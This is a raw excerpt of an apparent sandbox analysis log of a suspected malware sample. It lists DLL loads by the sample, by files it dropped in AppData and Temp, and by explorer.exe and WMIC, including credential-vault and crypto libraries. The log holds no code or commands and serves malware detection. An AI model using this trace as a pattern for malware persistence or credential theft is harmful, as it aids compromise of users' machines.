      Source: C:\Users\user\Desktop\bCnarg2O62.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\bCnarg2O62.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\bCnarg2O62.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\bCnarg2O62.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: winscard.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: devobj.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: cryptnet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
      Source: C:\Windows\explorer.exeSection loaded: aepic.dll
      Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
      Source: C:\Windows\explorer.exeSection loaded: userenv.dll
      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
      Source: C:\Windows\explorer.exeSection loaded: dxgi.dll
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\explorer.exeSection loaded: propsys.dll
      Source: C:\Windows\explorer.exeSection loaded: coremessaging.dll
      Source: C:\Windows\explorer.exeSection loaded: urlmon.dll
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dll
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dll
      Source: C:\Windows\explorer.exeSection loaded: wininet.dll
      Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
      Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
      Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\explorer.exeSection loaded: ntmarta.dll
      Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
      Source: C:\Windows\explorer.exeSection loaded: wldp.dll
      Source: C:\Windows\explorer.exeSection loaded: iertutil.dll
      Source: C:\Windows\explorer.exeSection loaded: srvcli.dll
      Source: C:\Windows\explorer.exeSection loaded: netutils.dll
      Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
      Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
